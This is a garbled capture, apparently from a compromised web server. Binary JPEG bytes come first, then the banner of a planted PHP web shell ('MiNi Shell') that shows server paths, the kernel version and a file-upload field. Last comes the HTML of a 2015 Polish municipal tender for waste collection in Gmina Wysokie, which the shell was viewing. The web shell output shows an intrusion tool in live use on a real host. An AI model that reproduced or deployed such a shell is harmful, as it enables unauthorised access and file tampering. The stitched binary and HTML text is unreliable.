JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151030/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151030/291658-N-2015.html

<p class="kh_header"><b>Wysokie: Odbiór i zagospodarowanie odpadów komunalnych z terenu Gminy Wysokie</b><br>
<b>Numer ogłoszenia: 291658 - 2015; data zamieszczenia: 30.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Wysokie , ul. Nowa 1, 23-145 Wysokie, woj. lubelskie, tel. 084 6806206, faks 084 6806244.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wysokie.lubelskie.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych z terenu Gminy Wysokie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest odbiór i zagospodarowanie zmieszanych i zbieranych selektywnie odpadów komunalnych z terenu Gminy Wysokie obejmujących  nieruchomości zamieszkałe przez mieszkańców Gminy Wysokie oraz nieruchomości niezamieszkałe na których powstają odpady komunalne, Punktu Selektywnej Zbiórki Odpadów Komunalnych
1.Charakterystyka Gminy
1)Powierzchnia gminy -114 km2.
2)Liczba mieszkańców zameldowanych na pobyt stały wg stanu na dzień 30.09.2015 r.-  4715.
3)Szacowana liczba gospodarstw od których będą odbierane odpady - około 1330,w tym tereny zamieszkałe stanowią  około 1280  a tereny niezamieszkałe na których nie zamieszkują mieszkańcy a powstają odpady komunalne około 50 .   
4)Liczba gospodarstw w trakcie umowy może się zmieniać z powodów  naturalnych -  wyludniania  bądź pojawiania się nowych  gospodarstw.   
5)Sołectwa wchodzące w skład Gminy Wysokie: Antoniówka, Biskupie, Biskupie Kolonia, Dragany, Guzówka, Giełczew Pierwsza, Giełczew Druga, Giełczew Kolonia, Giełczew Doły, Kajetanów, Łosień, Maciejów Nowy, Maciejów Stary, Nowy Dwór, Rezerwa, Radomirka, Słupeczno, Spławy, Stolnikowizna, Wysokie, Zabłocie.
6)Ilość odebranych odpadów z terenu Gminy Wysokie w 2014 r.: zmieszane - 364,40 Mg, selektywnie zebrane - 50,2 Mg . 
7)Szacunkowa ilość odpadów komunalnych zebrana w sposób selektywny - 150,00  Mg. 
Szacunkowa ilość odpadów komunalnych zebrana w sposób nieselektywny ( odpady zmieszane) - 400,00 Mg. Szacunkowa ilość odpadów przeznaczonych do odbioru i zagospodarowania może ulec zmianie. 
8)Punkt Selektywnej Zbiórki Odpadów Komunalnych mieści się w Wysokie na terenie byłego  gminnego składowiska odpadów. 
9)Mapa gminy stanowi załącznik nr 6 do SIWZ. 
10)Gmina Wysokie zgodnie z  Planem Gospodarki Odpadami Województwa Lubelskiego   należy do Regionu Południowo - Zachodniego. 
11)Pojemniki na odpady zmieszane  o pojemności  120 litrów  dla mieszkańców zapewnia Gmina. 
12)Do dnia  15 grudnia 2015 r.  Gmina przekaże wykaz gospodarstw domowych oraz nieruchomości niezamieszkałych na których powstają odpady komunalne z których należy odbierać odpady wraz z informacją czy dana nieruchomość/  gospodarstwo zadeklarowało segregację śmieci.  
2.Zakres rzeczowy przedmiotu zamówienia
Odbiór odpadów komunalnych Wykonawca będzie świadczył zgodnie z przepisami, obowiązującego prawa, a w szczególności z: -ustawą z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska ( t. j. Dz. U. z 2013 r.  poz. 1232 z późn. zm.), 
-ustawą z dnia 13 września 1996 r. o utrzymaniu czystości i porządku w gminach ( t. j.  Dz. U.  z 2013 r.  poz. 1399  z  późn. zm.), 
-ustawą z dnia 14 grudnia 2012 r. o odpadach ( Dz. U. z 2013 r.  poz. 21 z późn. zm.), 
-rozporządzeniem Ministra Środowiska z dnia 12 grudnia 2014 r. w sprawie wzorów dokumentów stosowanych na potrzeby ewidencji odpadów       ( Dz. U. z 2014 r. poz.  1973 ),
-rozporządzeniem Ministra Środowiska z dnia 9 grudnia 2014 r. w sprawie katalogu odpadów ( Dz. U. z 2014 r. poz.1923), 
-rozporządzeniem Ministra Środowiska z dnia 15 maja 2012 r. w sprawie wzorów sprawozdań o odebranych odpadach komunalnych, odebranych nieczystościach ciekłych oraz realizacji zadań z zakresu gospodarowania odpadami komunalnymi ( Dz. U. z 2012 r.  poz.  630 ), 
-rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości ( Dz. U. z  2013 r.  poz. 122 ), 
-rozporządzeniem Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia oraz odzysku innymi metodami niektórych frakcji odpadów komunalnych ( Dz. U. z 2012 r.  poz. 645 ); 
-rozporządzeniem Ministra Środowiska z dnia 25 maja 2012 r. w sprawie poziomów ograniczania masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczenia masy tych odpadów ( Dz. U. z 2012 r.  poz. 676), 
-Planem gospodarki odpadami dla województwa lubelskiego uchwalonym przez Sejmik Województwa Lubelskiego w dniu 30.07.2012 r.                          (Uchwała nr XXIV/396/2012).   
-obowiązującym  Regulaminem utrzymania czystości i porządku na terenie Gminy Wysokie.     	 	 
Do obowiązków Wykonawcy należy: 
1)Odbiór pojemników i worków z odpadami ustawionych  przy najbliższej drodze publicznej  a także bezpośrednio z nieruchomości trudnodostępnych   następujących frakcji   odpadów:    
a.odpady zmieszane,  
b.odpady zbierane selektywnie: papier i tektura, szkło, tworzywa sztuczne, opakowania wielomateriałowe, metale pod warunkiem zgromadzenia  ich przez właścicieli nieruchomości w odpowiednich pojemnikach lub workach. Wykonawca zobowiązany jest również do zebrania odpadów leżących obok    pojemników (posprzątania) gdy zajdzie taka potrzeba w tym również worków  dostawionych z nie segregowanymi odpadami, informując o tym Zamawiającego. Wykonawca będzie odbierał  odpady komunalne  od wszystkich właścicieli nieruchomości zamieszkałych oraz niezamieszkałych w tym  z nieruchomości trudno dostępnych poprzez zorganizowanie środków transportu, które umożliwią  odbiór odpadów  z tych  miejsc. 
2)Odbiór odpadów, o których mowa w pkt 1)  z następującą częstotliwością
Zmieszane odpady
Zabudowa zagrodowa i jednorodzinna : jeden raz w miesiącu
Zabudowa wielorodzinna : jeden raz w miesiącu 
Nieruchomości niezamieszkałe: dwa razy w miesiącu
Selektywnie zebrane odpady 
Zabudowa zagrodowa i jednorodzinna:  jeden raz w miesiącu
Zabudowa wielorodzinna:  jeden raz w miesiącu
Nieruchomości niezamieszkałe: dwa razy w miesiącu
w godzinach   7 - 19 od poniedziałku do soboty. 
3)	Wykonawca zobowiązany jest do opracowania harmonogramu odbioru odpadów i uzyskania jego akceptacji ze strony Zamawiającego. Harmonogram odbioru odpadów ( po wcześniejszym jego  uzgodnieniu z Zamawiającym) Wykonawca  dostarczy mieszkańcom w terminie do 31.12.2015 r. Wykonawca jest zobowiązany poinformować mieszkańców o zmianie harmonogramu,  ( po uprzednim uzyskaniu akceptacji Zamawiającego na proponowaną zmianę),  z co najmniej dwutygodniowym wyprzedzeniem w stosunku do terminu od którego ma być stosowany. Zamawiający przewiduje możliwość odebrania odpadów w terminie innym niż wynikającym z uzgodnionego harmonogramu w przypadku zaistnienia obiektywnych okoliczności niezależnych od wykonawcy np. złe warunki atmosferyczne (intensywne opady deszczu, śniegu, roztopy) uniemożliwiające dojazd do miejsca odbioru odpadów). 
4)Odbiór odpadów z Punktu Selektywnej Zbiórki Odpadów Komunalnych na zgłoszenie    Zamawiającego, nie rzadziej niż raz w roku:
a.odpady zielone
b.odpady segregowane
c.meble i odpady wielkogabarytowe
d.odpady budowlane, remontowe i rozbiórkowe
e.zużyte opony
f.odpady niebezpieczne ( w tym rozpuszczalniki, kwasy, alkalia, lampy fluorescencyjne, oleje, tłuszcze, farby).
Odpady będą zbierane w pojemniki dostarczone przez Wykonawcę. 
5)Wykonawca będzie dostarczał nieodpłatnie nieruchomościom mieszkańcom Gminy Wysokie zgodnie  z wykazem przekazanym przez Zamawiającego worki na segregowane odpady komunalne w ilości wystarczającej. Worki  przezroczyste o pojemności 120 litrów z folii LDPE o grubości zapewniającej  wytrzymałość worków ( min. 60 ?m) z czytelnie oznaczoną informacją o rodzaju gromadzonych odpadów, nazwą, adresem  i numerem telefonu Wykonawcy. Selektywnie zbierane do worków  odpady komunalne  obejmują: 
a.papier i makulaturę (worek niebieski),  
b.szkło, opakowania szklane  (worek zielony), 
c.metale, tworzywa sztuczne  (worek żółty).  
Szacuje się średnio dwa worki na jedno gospodarstwo domowe/ nieruchomość niezamieszkałą miesięcznie. Pierwsze komplety worków należy dostarczyć właścicielom nieruchomości do 31.12. 2015 r. Wykonawca w ramach usługi dostarczy do Urzędu Gminy Wysokie po 100 worków każdego koloru tzw. pakiet awaryjny  i będzie uzupełniał stan worków w razie ich braku po uzgodnieniu tego faktu z zamawiającym. 
Wykonawca będzie dostarczał  nieodpłatnie  mieszkańcom Gminy Wysokie  worki na odpady zmieszane   w ilości wystarczającej. Worki czarne 120 litrów odpowiednio wytrzymałe i czytelnie oznaczone informacją o rodzaju gromadzonych odpadów, nazwą, adresem i numerem telefonu Wykonawcy. Szacowana ilość gospodarstw przewidzianych do odbioru odpadów zmieszanych gromadzonych w workach -10% gospodarstw. Szacuje się średnio 2  worki na jedno gospodarstwo domowe miesięcznie.  
6)Wykonawca zobowiązany jest do wyposażenia PSZOK i miejsc użyteczności publicznej w pojemniki o pojemności 1100 l - sztuk 7 oraz pojemnik 7000 l - sztuk 1. 
7)Wykonawca raz w roku zorganizuje zbiórkę na terenie Gminy  sprzętu elektrycznego i elektronicznego w formie wystawki przy drodze w poszczególnych miejscowościach.
8)Wykonawca zobowiązany jest do przekazywania odebranych zmieszanych odpadów komunalnych do Regionalnej Instalacji Przetwarzania Odpadów Komunalnych wskazanej w Planie Gospodarki Odpadami dla Województwa Lubelskiego oraz do przekazywania selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania odpadów zgodnie z hierarchią postępowania z odpadami o której mowa w art. 17 ustawy z 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r.  poz. 21 z późn. zm.) 
9)Wykonawca w okresie obowiązywania umowy zobowiązany jest  do osiągnięcia 
w odniesieniu do masy odebranych odpadów z terenu Gminy Wysokie poziomów recyklingu i przygotowania do ponownego  użycia następujących frakcji  odpadów komunalnych: papieru, metali, tworzyw sztucznych i szkła, poziomów recyklingu i przygotowania do ponownego użycia i odzysku  innymi metodami innych niż niebezpieczne odpadów budowlanych i rozbiórkowych  w wysokości określonej dla gmin  w przepisach  rozporządzenia  Ministra Środowiska  z dnia 29 maja 2012 roku w sprawie poziomów recyklingu, przygotowania do ponownego użycia  i odzysku innymi metodami niektórych frakcji odpadów komunalnych ( Dz. U. z 2012 r.  poz. 645 ). 
10)Wykonawca w okresie obowiązywania umowy jest zobowiązany  ograniczyć masę odpadów komunalnych ulegających biodegradacji odbieranych z terenu Gminy Wysokie przekazywanych do składowania do wysokości  określonej w przepisach rozporządzenia  Ministra Środowiska  z dnia 25 maja  2012 r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu  obliczania poziomu ograniczania masy tych odpadów ( Dz. U. z 2012 r.  poz. 676 ). 
11)Wykonawca zobowiązany będzie do monitorowania ciążących na właścicielu nieruchomości  obowiązków w zakresie segregowania odpadów komunalnych, gromadzenia odpadów w pojemnikach i workach - zgodnie z obowiązującym Regulaminem utrzymania czystości i porządku na terenie Gminy Wysokie i złożoną deklaracją. W przypadku stwierdzenia, że właściciel nieruchomości nie wywiązuje się z obowiązku segregacji odpadów, Wykonawca odbiera odpady jako zmieszane. Przez monitorowanie  Zamawiający rozumie  sprawdzenie zawartości pojemników i worków poprzez zajrzenie przez Wykonawcę do pojemników i  worków, celem  stwierdzenia czy właściciel prowadzi selektywną zbiórkę odpadów. Wykonawca jest zobowiązany do niezwłocznego przekazania Zamawiającemu ( drogą elektroniczną, faksem lub pisemnie, maksymalnie do 7 dni roboczych ) informacji o niezgodnym z Regulaminem utrzymania czystości i porządku na terenie gminy Wysokie gromadzeniu odpadów, w szczególności ich mieszaniu lub przekazywaniu odpadów niezgodnie z deklaracją w zakresie selektywnego zbierania. Informacja powinna zawierać  w szczególności: adres nieruchomości, na której odpady gromadzone są w sposób niezgodny z Regulaminem utrzymania czystości i porządku na terenie Gminy Wysokie lub z deklaracją, dane pracowników, którzy stwierdzili fakty niezgodne z Regulaminem utrzymania czystości  i porządku na terenie Gminy Wysokie lub z deklaracją oraz dokładną datę i godzinę stwierdzenia tych faktów. 
12)Wykonawca zobowiązany jest do prowadzenia i przekazywania Zamawiającemu  dokumentacji związanej z przedmiotem zamówienia, w tym m.in.: 
a)prowadzenia i przekazywania co miesiąc Zamawiającemu: informacji o ilości odebranych odpadów (zmieszanych i selektywnie zebranych),  z podaniem ilości zebranych poszczególnych rodzajów odpadów, Oświadczenia                o odebraniu odpadów wystawionych przez mieszkańców w danym miesiącu, informacji o adresach nieruchomości potencjalnie zamieszkałych , na których powstały odpady , nieujętych w bazie adresowej przekazanej Wykonawcy przez Zamawiającego.
b)sprawozdań, o których mowa w art. 9 n ustawy o utrzymaniu czystości i porządku w gminach ( t. j. Dz. U. z 2013 r.  poz. 1399 z późn. zm.) 
- i przekazywania ich Wójtowi Gminy Wysokie w terminie do końca miesiąca następującego po upływie półrocza którego dotyczy. Wójt Gminy Wysokie może zobowiązać wykonawcę odbierającego odpady komunalne od właścicieli nieruchomości do okazania dokumentów w celu weryfikacji danych zawartych w sprawozdaniu sporządzanych na potrzeby ewidencji odpadów oraz dokumentów potwierdzających osiągnięcie określonych poziomów recyklingu, 
przygotowania do ponownego użycia i odzysku następujących frakcji  odpadów komunalnych: papieru, metali, tworzyw sztucznych i szkła, poziomów recyklingu i przygotowania do ponownego użycia i odzysku innymi metodami innych niż niebezpieczne odpadów budowlanych i rozbiórkowych  oraz ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania.
13)Wykonawca zobowiązany jest  do: 
a)posiadania wyposażenia umożliwiającego odbieranie odpadów komunalnych od właścicieli oraz zapewnienia jego odpowiedniego stanu technicznego, 
b)utrzymania odpowiedniego stanu sanitarnego pojazdów i urządzeń do odbierania odpadów komunalnych, 
c)spełnienia wymagań technicznych dotyczących wyposażenia pojazdów, 
d)posiadania odpowiednio usytuowanej i wyposażonej  bazy magazynowo- transportowej  z :
- z zachowaniem wszystkich wymogów wynikających z przepisów rozporządzenia Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli  nieruchomości ( Dz. U. z  2013 r. poz. 122 ). 
14)Wykonawca jest zobowiązany do realizacji reklamacji np.nieodebranie odpadów zgodnie z harmonogramem, nie pozostawienie worków w przeciągu 48 godzin od otrzymania informacji od Zamawiającego. 
15)Jeżeli podczas odbierania odpadów dojdzie do uszkodzenia lub zniszczenia   pojemników z winy Wykonawcy, Wykonawca zobowiązany będzie do natychmiastowej wymiany uszkodzonego pojemnika na własny koszt..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.00.00.00-7, 90.51.31.00-7, 90.53.30.00-2, 90.50.00.00-2, 90.51.40.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Ustala się  wadium  w wysokości 3 000,00 zł., słownie trzy tysiące 00/100.
2.Wadium musi być wniesione przed upływem terminu składania ofert .
3.Wadium może być wniesione w jednej lub kilku formach określonych w art. 45 ust. 6 ustawy PZP. 
4.Wadium wniesione w pieniądzu należy wpłacać przelewem na rachunek bankowy Zamawiającego w Spółdzielczy Bank Powiatowy w Piaskach Oddział Wysokie 32 8689 0007 9706 5096 2000 0010. z dopiskiem Odbiór i zagospodarowanie odpadów komunalnych z terenu Gminy Wysokie
5.Zamawiający zwróci lub zatrzyma wadium zgodnie z art. 46 ustawy.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeżeli Wykonawcy 
a)posiadają aktualne zezwolenie na transport odpadów wydane przez właściwy organ  zgodnie z ustawą z dnia 14 grudnia 2012 roku o odpadach ( Dz. U. z 2013 r. poz.21 z późn. zm.), 
b)posiadają aktualny wpis do rejestru działalności  regulowanej  prowadzonej przez Wójta Gminy Wysokie, w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w zakresie spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca :
 a)będzie dysponował samochodami spełniającymi wymogi techniczne do odbioru odpadów w łącznej ilości:
 - co najmniej dwa pojazdy przystosowane do odbierania zmieszanych odpadów komunalnych, 
- co najmniej dwa pojazdy przystosowane do odbierania odpadów komunalnych zbieranych selektywnie,
 - co najmniej jeden pojazd bez funkcji kompaktującej
 i na potwierdzenie spełnienia powyższego warunku przedstawi wykaz wymaganego sprzętu wraz z informacją o podstawie do dysponowania tymi zasobami.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w zakresie spełniania tego warunku.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie uznany za spełniony jeżeli Wykonawca:
a) posiada ubezpieczenie z tytułu odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia ( odbiorem i zagospodarowaniem odpadów) na kwotę nie mniejszą niż 300 000,00 zł i na potwierdzenie spełnienia powyższego warunku przedłoży Zamawiającemu opłaconą polisę, a w przypadku jej braku inny dokument na sumę ubezpieczenia nie mniejszą niż 300 000,00 zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1) Formularz ofertowy, 
